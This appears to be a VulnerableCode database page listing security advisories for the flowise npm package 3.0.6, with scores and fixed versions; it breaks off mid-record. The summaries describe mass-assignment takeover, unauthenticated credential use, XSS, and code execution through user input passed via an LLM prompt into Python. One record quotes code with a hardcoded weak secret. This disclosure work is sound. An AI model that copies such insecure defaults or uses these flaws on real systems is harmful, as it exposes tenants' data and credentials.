Django REST framework

Package Instance

Lookup for vulnerable packages by Package URL.

Purlpkg:npm/flowise@3.0.6
Typenpm
Namespace
Nameflowise
Version3.0.6
Qualifiers
Subpath
Is_vulnerabletrue
Next_non_vulnerable_version3.1.2
Latest_non_vulnerable_version3.1.2
Affected_by_vulnerabilities
0
url VCID-14af-nhf3-aqba
vulnerability_id VCID-14af-nhf3-aqba
summary Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, a Mass Assignment vulnerability in the DocumentStore creation endpoint allows authenticated users to control the primary key (id) and internal state fields of DocumentStore entities. Because the service uses repository.save() with a client-supplied primary key, the POST create endpoint behaves as an implicit UPSERT operation. This enables overwriting existing DocumentStore objects. In multi-workspace or multi-tenant deployments, this can lead to cross-workspace object takeover and broken object-level authorization (IDOR), allowing an attacker to reassign or modify DocumentStore objects belonging to other workspaces. This vulnerability is fixed in 3.1.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-41277
reference_id
reference_type
scores
0
value 0.00321
scoring_system epss
scoring_elements 0.55655
published_at 2026-06-13T12:55:00Z
1
value 0.00321
scoring_system epss
scoring_elements 0.55642
published_at 2026-06-14T12:55:00Z
2
value 0.00321
scoring_system epss
scoring_elements 0.55521
published_at 2026-06-11T12:55:00Z
3
value 0.00321
scoring_system epss
scoring_elements 0.55641
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-41277
1
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-41277
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 7.6
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-41277
2
reference_url https://github.com/advisories/GHSA-3prp-9gf7-4rxx
reference_id GHSA-3prp-9gf7-4rxx
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-3prp-9gf7-4rxx
3
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-3prp-9gf7-4rxx
reference_id GHSA-3prp-9gf7-4rxx
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value 7.6
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N
3
value HIGH
scoring_system generic_textual
scoring_elements
4
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-25T01:31:25Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-3prp-9gf7-4rxx
fixed_packages
0
url pkg:npm/flowise@3.1.0
purl pkg:npm/flowise@3.1.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-2891-vddv-ebff
1
vulnerability VCID-3chx-dj2u-kbab
2
vulnerability VCID-5j9e-bcr5-n7bs
3
vulnerability VCID-67mz-pfy4-ykep
4
vulnerability VCID-9rqv-p7rz-5kar
5
vulnerability VCID-cb6d-4c2v-w7c3
6
vulnerability VCID-cxja-9yxc-k7au
7
vulnerability VCID-gt6n-beak-33gy
8
vulnerability VCID-hdej-umwh-kqav
9
vulnerability VCID-kpyg-gve3-b3av
10
vulnerability VCID-qm89-q2ar-uyhy
11
vulnerability VCID-r74e-k86f-7qgb
12
vulnerability VCID-s3jg-wce1-fbf3
13
vulnerability VCID-xt1d-efw7-g3c6
14
vulnerability VCID-z1y2-f2ws-8ycb
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0
aliases CVE-2026-41277, GHSA-3prp-9gf7-4rxx
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-14af-nhf3-aqba
1
url VCID-17k4-psgt-sydg
vulnerability_id VCID-17k4-psgt-sydg
summary 
Flowise: Weak Default Token Hash Secret
**Detection Method:** Kolega.dev Deep Code Scan

| Attribute | Value |
|---|---|
| Location | packages/server/src/enterprise/utils/tempTokenUtils.ts:31-34 |
| Practical Exploitability | Medium |
| Developer Approver | faizan@kolega.ai |

### Description
The encryption key for token encryption has a weak default value 'Secre$t' when TOKEN_HASH_SECRET environment variable is not set.

### Affected Code
```
const key = crypto
    .createHash('sha256')
    .update(process.env.TOKEN_HASH_SECRET || 'Secre$t')
    .digest()
```

### Evidence
The default value 'Secre$t' is hardcoded in the source code and is cryptographically weak. This key is used to encrypt user IDs and workspace IDs in JWT tokens.

### Impact
Token forgery - attackers can decrypt and manipulate encrypted token metadata, potentially changing user IDs or workspace IDs to escalate privileges or access unauthorized data.

### Recommendation
Require TOKEN_HASH_SECRET to be set as a strong random value in environment variables. Throw an error on startup if not configured. Use a minimum of 32 bytes of entropy.

### Notes
The TOKEN_HASH_SECRET has a weak hardcoded default 'Secre$t' (lines 31-34 and 50-53). This secret is used to derive an AES-256-CBC encryption key for encrypting sensitive metadata (user ID and workspace ID) embedded in JWT tokens via encryptToken() called at line 394 of passport/index.ts. If TOKEN_HASH_SECRET is not configured, an attacker knowing the default can decrypt the 'meta' field in JWTs to extract user IDs and workspace IDs. While this alone doesn't grant access (the JWT signature is separate), it leaks internal identifiers that could aid other attacks. The .env.example shows '# TOKEN_HASH_SECRET='popcorn'' - another weak value, and it's commented out suggesting it's optional. The application should require this secret to be explicitly set with a strong random value.
references
0
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-m7mq-85xj-9x33
reference_id
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-m7mq-85xj-9x33
1
reference_url https://github.com/advisories/GHSA-m7mq-85xj-9x33
reference_id GHSA-m7mq-85xj-9x33
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-m7mq-85xj-9x33
fixed_packages
0
url pkg:npm/flowise@3.1.0
purl pkg:npm/flowise@3.1.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-2891-vddv-ebff
1
vulnerability VCID-3chx-dj2u-kbab
2
vulnerability VCID-5j9e-bcr5-n7bs
3
vulnerability VCID-67mz-pfy4-ykep
4
vulnerability VCID-9rqv-p7rz-5kar
5
vulnerability VCID-cb6d-4c2v-w7c3
6
vulnerability VCID-cxja-9yxc-k7au
7
vulnerability VCID-gt6n-beak-33gy
8
vulnerability VCID-hdej-umwh-kqav
9
vulnerability VCID-kpyg-gve3-b3av
10
vulnerability VCID-qm89-q2ar-uyhy
11
vulnerability VCID-r74e-k86f-7qgb
12
vulnerability VCID-s3jg-wce1-fbf3
13
vulnerability VCID-xt1d-efw7-g3c6
14
vulnerability VCID-z1y2-f2ws-8ycb
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0
aliases GHSA-m7mq-85xj-9x33
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-17k4-psgt-sydg
2
url VCID-19jc-umg6-v7ce
vulnerability_id VCID-19jc-umg6-v7ce
summary Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, multiple tool implementations directly import and invoke raw HTTP clients (node-fetch, axios) instead of using the secured wrapper. These tools include (1) OpenAPIToolkit/OpenAPIToolkit.ts, (2) WebScraperTool/WebScraperTool.ts, (3) MCP/core.ts, and (4) Arxiv/core.ts. This vulnerability is fixed in 3.1.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-43995
reference_id
reference_type
scores
0
value 0.00066
scoring_system epss
scoring_elements 0.20656
published_at 2026-06-11T12:55:00Z
1
value 0.00092
scoring_system epss
scoring_elements 0.26147
published_at 2026-06-13T12:55:00Z
2
value 0.00092
scoring_system epss
scoring_elements 0.26132
published_at 2026-06-14T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-43995
1
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-43995
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-43995
2
reference_url https://github.com/advisories/GHSA-qqvm-66q4-vf5c
reference_id GHSA-qqvm-66q4-vf5c
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-qqvm-66q4-vf5c
3
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-qqvm-66q4-vf5c
reference_id GHSA-qqvm-66q4-vf5c
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T18:19:54Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-qqvm-66q4-vf5c
fixed_packages
0
url pkg:npm/flowise@3.1.0
purl pkg:npm/flowise@3.1.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-2891-vddv-ebff
1
vulnerability VCID-3chx-dj2u-kbab
2
vulnerability VCID-5j9e-bcr5-n7bs
3
vulnerability VCID-67mz-pfy4-ykep
4
vulnerability VCID-9rqv-p7rz-5kar
5
vulnerability VCID-cb6d-4c2v-w7c3
6
vulnerability VCID-cxja-9yxc-k7au
7
vulnerability VCID-gt6n-beak-33gy
8
vulnerability VCID-hdej-umwh-kqav
9
vulnerability VCID-kpyg-gve3-b3av
10
vulnerability VCID-qm89-q2ar-uyhy
11
vulnerability VCID-r74e-k86f-7qgb
12
vulnerability VCID-s3jg-wce1-fbf3
13
vulnerability VCID-xt1d-efw7-g3c6
14
vulnerability VCID-z1y2-f2ws-8ycb
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0
aliases CVE-2026-43995, GHSA-qqvm-66q4-vf5c
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-19jc-umg6-v7ce
3
url VCID-1xfp-4rtg-4bcu
vulnerability_id VCID-1xfp-4rtg-4bcu
summary Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, there is a remote code execution vulnerability in AirtableAgent.ts caused by lack of input verification when using Pandas. The user’s input is directly applied to the question parameter within the prompt template and it is reflected to the Python code without any sanitization. This vulnerability is fixed in 3.1.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-41138
reference_id
reference_type
scores
0
value 0.00575
scoring_system epss
scoring_elements 0.69337
published_at 2026-06-14T12:55:00Z
1
value 0.00575
scoring_system epss
scoring_elements 0.69236
published_at 2026-06-11T12:55:00Z
2
value 0.00575
scoring_system epss
scoring_elements 0.6934
published_at 2026-06-13T12:55:00Z
3
value 0.00575
scoring_system epss
scoring_elements 0.69328
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-41138
1
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-41138
reference_id
reference_type
scores
0
value 8.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-41138
2
reference_url https://github.com/advisories/GHSA-f228-chmx-v6j6
reference_id GHSA-f228-chmx-v6j6
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-f228-chmx-v6j6
3
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-f228-chmx-v6j6
reference_id GHSA-f228-chmx-v6j6
reference_type
scores
0
value 8.3
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L
1
value 8.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L
2
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
3
value HIGH
scoring_system generic_textual
scoring_elements
4
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-24T14:18:47Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-f228-chmx-v6j6
fixed_packages
0
url pkg:npm/flowise@3.1.0
purl pkg:npm/flowise@3.1.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-2891-vddv-ebff
1
vulnerability VCID-3chx-dj2u-kbab
2
vulnerability VCID-5j9e-bcr5-n7bs
3
vulnerability VCID-67mz-pfy4-ykep
4
vulnerability VCID-9rqv-p7rz-5kar
5
vulnerability VCID-cb6d-4c2v-w7c3
6
vulnerability VCID-cxja-9yxc-k7au
7
vulnerability VCID-gt6n-beak-33gy
8
vulnerability VCID-hdej-umwh-kqav
9
vulnerability VCID-kpyg-gve3-b3av
10
vulnerability VCID-qm89-q2ar-uyhy
11
vulnerability VCID-r74e-k86f-7qgb
12
vulnerability VCID-s3jg-wce1-fbf3
13
vulnerability VCID-xt1d-efw7-g3c6
14
vulnerability VCID-z1y2-f2ws-8ycb
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0
aliases CVE-2026-41138, GHSA-f228-chmx-v6j6
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-1xfp-4rtg-4bcu
4
url VCID-2891-vddv-ebff
vulnerability_id VCID-2891-vddv-ebff
summary Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, a mass assignment vulnerability exists in the chatflow update endpoint of FlowiseAI. The endpoint allows clients to modify server-controlled properties such as deployed, isPublic, workspaceId, createdDate, and updatedDate when updating a chatflow object. Due to missing server-side validation and authorization checks, an authenticated user can manipulate internal attributes of a chatflow and reassign it to another workspace. This allows cross-workspace resource reassignment and unauthorized modification of deployment and visibility settings. This issue has been patched in version 3.1.2.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-42863
reference_id
reference_type
scores
0
value 0.00062
scoring_system epss
scoring_elements 0.19629
published_at 2026-06-11T12:55:00Z
1
value 0.0008
scoring_system epss
scoring_elements 0.2392
published_at 2026-06-13T12:55:00Z
2
value 0.0008
scoring_system epss
scoring_elements 0.23912
published_at 2026-06-12T12:55:00Z
3
value 0.0009
scoring_system epss
scoring_elements 0.25709
published_at 2026-06-14T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-42863
1
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-42863
reference_id
reference_type
scores
0
value 7.6
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-42863
2
reference_url https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.1.2
reference_id flowise%403.1.2
reference_type
scores
0
value 7.6
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-06-08T16:22:28Z/
url https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.1.2
3
reference_url https://github.com/advisories/GHSA-5wxp-qjgq-fx6m
reference_id GHSA-5wxp-qjgq-fx6m
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-5wxp-qjgq-fx6m
4
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-5wxp-qjgq-fx6m
reference_id GHSA-5wxp-qjgq-fx6m
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
1
value 7.6
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-06-08T16:22:28Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-5wxp-qjgq-fx6m
fixed_packages
0
url pkg:npm/flowise@3.1.2
purl pkg:npm/flowise@3.1.2
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.2
aliases CVE-2026-42863, GHSA-5wxp-qjgq-fx6m
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-2891-vddv-ebff
5
url VCID-39aw-3gc6-bkgb
vulnerability_id VCID-39aw-3gc6-bkgb
summary Flowise before 3.0.5 allows XSS via an IFRAME element when an admin views the chat log.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-50538
reference_id
reference_type
scores
0
value 0.00102
scoring_system epss
scoring_elements 0.27713
published_at 2026-06-14T12:55:00Z
1
value 0.00102
scoring_system epss
scoring_elements 0.27724
published_at 2026-06-13T12:55:00Z
2
value 0.00102
scoring_system epss
scoring_elements 0.27699
published_at 2026-06-12T12:55:00Z
3
value 0.00102
scoring_system epss
scoring_elements 0.27496
published_at 2026-06-11T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-50538
1
reference_url https://github.com/FlowiseAI/Flowise/commit/9a06a85a8ddcbaeca1342827a5fea9087a587d97
reference_id
reference_type
scores
0
value 9.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/FlowiseAI/Flowise/commit/9a06a85a8ddcbaeca1342827a5fea9087a587d97
2
reference_url https://github.com/FlowiseAI/Flowise/pull/4905
reference_id 4905
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
1
value 9.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-06T13:53:34Z/
url https://github.com/FlowiseAI/Flowise/pull/4905
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-50538
reference_id CVE-2025-50538
reference_type
scores
0
value 9.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-50538
4
reference_url https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.5
reference_id flowise%403.0.5
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
1
value 9.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-06T13:53:34Z/
url https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.5
5
reference_url https://github.com/advisories/GHSA-964p-j4gg-mhwc
reference_id GHSA-964p-j4gg-mhwc
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-964p-j4gg-mhwc
6
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-964p-j4gg-mhwc
reference_id GHSA-964p-j4gg-mhwc
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
1
value 9.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
2
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-10-06T13:53:34Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-964p-j4gg-mhwc
fixed_packages
0
url pkg:npm/flowise@3.0.8
purl pkg:npm/flowise@3.0.8
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14af-nhf3-aqba
1
vulnerability VCID-17k4-psgt-sydg
2
vulnerability VCID-19jc-umg6-v7ce
3
vulnerability VCID-1xfp-4rtg-4bcu
4
vulnerability VCID-2891-vddv-ebff
5
vulnerability VCID-3chx-dj2u-kbab
6
vulnerability VCID-3gp6-wwtd-kkf1
7
vulnerability VCID-488c-vrqu-f7hf
8
vulnerability VCID-5j9e-bcr5-n7bs
9
vulnerability VCID-5pup-kgaf-3ubw
10
vulnerability VCID-67mz-pfy4-ykep
11
vulnerability VCID-6ufs-d346-d7ev
12
vulnerability VCID-71uq-yx2j-cqak
13
vulnerability VCID-9bht-svq8-87b4
14
vulnerability VCID-9rqv-p7rz-5kar
15
vulnerability VCID-a1e4-f5dh-w3a5
16
vulnerability VCID-affy-v76q-fub6
17
vulnerability VCID-aqg8-6us7-uqef
18
vulnerability VCID-b97u-efzx-dffn
19
vulnerability VCID-bkmk-k9mn-ekhx
20
vulnerability VCID-cb6d-4c2v-w7c3
21
vulnerability VCID-cxja-9yxc-k7au
22
vulnerability VCID-d4wa-szeh-43ab
23
vulnerability VCID-dtss-epth-z7fh
24
vulnerability VCID-dzed-27rk-3qav
25
vulnerability VCID-e65e-s5sd-kuhp
26
vulnerability VCID-ejdc-j73x-jydk
27
vulnerability VCID-fu6t-9dk4-jbh9
28
vulnerability VCID-gt6n-beak-33gy
29
vulnerability VCID-gvpx-4wkw-43cz
30
vulnerability VCID-hdej-umwh-kqav
31
vulnerability VCID-hkfs-v3bp-kbh5
32
vulnerability VCID-j5hh-haj2-qydg
33
vulnerability VCID-jcze-eg2c-mkcf
34
vulnerability VCID-k579-xd81-hqdu
35
vulnerability VCID-kpyg-gve3-b3av
36
vulnerability VCID-ksmv-s6c9-t7ap
37
vulnerability VCID-m3j3-4u39-euht
38
vulnerability VCID-pzza-9xq9-a7de
39
vulnerability VCID-qm89-q2ar-uyhy
40
vulnerability VCID-r74e-k86f-7qgb
41
vulnerability VCID-rgmv-6bqh-eqf2
42
vulnerability VCID-s3jg-wce1-fbf3
43
vulnerability VCID-tdm1-91mc-8kgr
44
vulnerability VCID-v1nz-wwsu-qycg
45
vulnerability VCID-v9hg-7pex-g3dp
46
vulnerability VCID-w9yr-5jbp-q7fm
47
vulnerability VCID-xt1d-efw7-g3c6
48
vulnerability VCID-ywgu-76cy-uqe7
49
vulnerability VCID-z1y2-f2ws-8ycb
50
vulnerability VCID-zwna-stj5-3yhm
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.8
aliases CVE-2025-50538, GHSA-964p-j4gg-mhwc
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-39aw-3gc6-bkgb
6
url VCID-3chx-dj2u-kbab
vulnerability_id VCID-3chx-dj2u-kbab
summary Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, a mass assignment vulnerability exists in the variable update endpoint of FlowiseAI. The endpoint allows authenticated users to modify server-controlled properties such as workspaceId, createdDate, and updatedDate when updating a variable resource. Due to missing server-side validation and authorization checks, an attacker can manipulate the workspaceId field and reassign variables to arbitrary workspaces. This behavior may break tenant isolation in multi-workspace environments. This issue has been patched in version 3.1.2.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-42861
reference_id
reference_type
scores
0
value 0.00062
scoring_system epss
scoring_elements 0.19589
published_at 2026-06-11T12:55:00Z
1
value 0.0008
scoring_system epss
scoring_elements 0.23879
published_at 2026-06-13T12:55:00Z
2
value 0.0008
scoring_system epss
scoring_elements 0.23871
published_at 2026-06-12T12:55:00Z
3
value 0.0009
scoring_system epss
scoring_elements 0.25657
published_at 2026-06-14T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-42861
1
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-42861
reference_id
reference_type
scores
0
value 7.6
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-42861
2
reference_url https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.1.2
reference_id flowise%403.1.2
reference_type
scores
0
value 7.6
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-06-09T15:27:50Z/
url https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.1.2
3
reference_url https://github.com/advisories/GHSA-6fw7-3q8r-m5vj
reference_id GHSA-6fw7-3q8r-m5vj
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-6fw7-3q8r-m5vj
4
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-6fw7-3q8r-m5vj
reference_id GHSA-6fw7-3q8r-m5vj
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
1
value 7.6
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-06-09T15:27:50Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-6fw7-3q8r-m5vj
fixed_packages
0
url pkg:npm/flowise@3.1.2
purl pkg:npm/flowise@3.1.2
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.2
aliases CVE-2026-42861, GHSA-6fw7-3q8r-m5vj
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-3chx-dj2u-kbab
7
url VCID-3gp6-wwtd-kkf1
vulnerability_id VCID-3gp6-wwtd-kkf1
summary Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the text-to-speech generation endpoint (POST /api/v1/text-to-speech/generate) is whitelisted (no auth) and accepts a credentialId directly in the request body. When called without a chatflowId, the endpoint uses the provided credentialId to decrypt the stored credential (e.g., OpenAI or ElevenLabs API key) and generate speech. This vulnerability is fixed in 3.1.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-41279
reference_id
reference_type
scores
0
value 0.00124
scoring_system epss
scoring_elements 0.31386
published_at 2026-06-13T12:55:00Z
1
value 0.00124
scoring_system epss
scoring_elements 0.31367
published_at 2026-06-14T12:55:00Z
2
value 0.00124
scoring_system epss
scoring_elements 0.31174
published_at 2026-06-11T12:55:00Z
3
value 0.00124
scoring_system epss
scoring_elements 0.31368
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-41279
1
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-41279
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value 8.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-41279
2
reference_url https://github.com/advisories/GHSA-5fw2-mwhh-9947
reference_id GHSA-5fw2-mwhh-9947
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-5fw2-mwhh-9947
3
